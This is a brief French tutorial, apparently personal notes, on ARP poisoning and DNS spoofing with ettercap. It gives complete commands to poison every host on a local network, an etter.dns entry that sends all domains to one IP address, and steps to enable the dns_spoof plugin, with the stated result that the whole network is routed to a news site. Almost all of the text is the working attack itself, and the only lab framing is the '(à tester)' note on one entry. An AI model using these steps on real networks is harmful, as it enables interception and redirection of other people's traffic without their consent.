• ARP poisoning sur fr.wikipedia.org

sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP
Ensuite tu appuies sur la touche 'p' et une liste plugin va s'afficher. De là tu entres le nom du plugin à activer et tu appuies sur la touche 'entrée'.

Exemple :

Pour que tout le monde voit une certaine page web, il faut éditer le fichier

sudo nano /usr/share/ettercap/etter.dns

ou selon distrib

sudo nano /etc/ettercap/etter.dns

Tu commentes toutes les lignes sauf une ou tu entres par exemple :

• .* A 212.95.67.222

ou pour Radio campus TRyphon > serveur Labo Campus (à tester)

• .tryphon.eu A 62.210.177.86

Ensuite :

sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP // //

puis touche 'p' et tu entres 'dns_spoof' puis touche 'entrée'

Et voilà, tout le réseau devrait être routé sur le site du Figaro

• using ettercap for arp poisoning sur eatingsecurity.blogspot.fr
• ettercap tutorial sur thegeekstuff.com